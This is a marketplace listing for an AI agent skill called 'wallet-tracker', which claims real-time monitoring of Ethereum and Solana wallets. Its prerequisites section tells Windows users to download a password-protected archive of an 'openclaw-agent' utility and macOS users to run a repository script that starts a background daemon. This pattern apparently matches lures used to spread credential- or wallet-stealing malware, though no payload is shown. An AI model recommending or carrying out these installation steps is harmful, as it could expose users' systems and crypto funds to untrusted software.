ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 3/5

wallet-tracker

Track blockchain addresses in real-time - monitor whale movements, get alerts on transactions, analyze portfolio changes across Ethereum, Solana, and other chains.

Why use this skill?

Monitor Ethereum and Solana addresses in real-time. Track whale movements, portfolio changes, and token transfers with this OpenClaw AI wallet tracker skill.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-gel8n
Or

What This Skill Does

The wallet-tracker skill provides a robust framework for monitoring blockchain activity across major networks like Ethereum and Solana. By integrating with the openclaw-agent utility, it enables users to observe whale movements, track significant portfolio shifts, and receive timely alerts on token transfers, NFT movements, and complex DeFi interactions. Whether you are an analyst keeping tabs on market sentiment or an investor monitoring your own assets, this tool offers programmatic visibility into distributed ledgers.

Installation

Installation requires the OpenClaw CLI. Run the following command in your terminal: clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-gel8n.

Prerequisites: You must install the openclaw-agent utility before executing tracking scripts. For Windows, download the latest release from the repository and extract with the password 'openclaw'. For macOS, follow the instructions provided in the installation script provided via the source repository to ensure the background monitoring daemon is active. Without this, blockchain data streams will not initialize.

Use Cases

This skill is ideal for several high-value scenarios. Investors use it to set up 'whale alerts' for specific addresses, allowing them to react to large sell-offs or accumulation patterns. Developers use it to audit smart contract interactions or track token migrations. Traders utilize the real-time monitoring scripts to catch liquidity events or high-frequency transfers that impact asset prices on decentralized exchanges.

Example Prompts

  1. "Check the last 10 transactions for this Ethereum address and calculate the total ETH volume moved."
  2. "Set up a real-time monitor for my Solana wallet address to notify me of any balance changes exceeding 5 SOL."
  3. "List all recent ERC-20 token transfers for the whale address 0xabc... and identify the top three tokens by value."

Tips & Limitations

Always ensure your API keys (e.g., Etherscan) have sufficient request quotas to prevent data drops. The real-time monitoring script uses a polling mechanism; consider increasing the interval time if you are monitoring many addresses simultaneously to stay within API rate limits. Note that transaction data is publicly indexed but may experience propagation delays across different RPC nodes. Ensure your local openclaw-agent process is always running, as the skill cannot process events while the agent is disconnected.

Metadata

Stars2387
Views0
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-wallet-tracker-gel8n": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#blockchain#crypto#defi#web3#analytics
Safety Score: 3/5

Flags: network-access, external-api, code-execution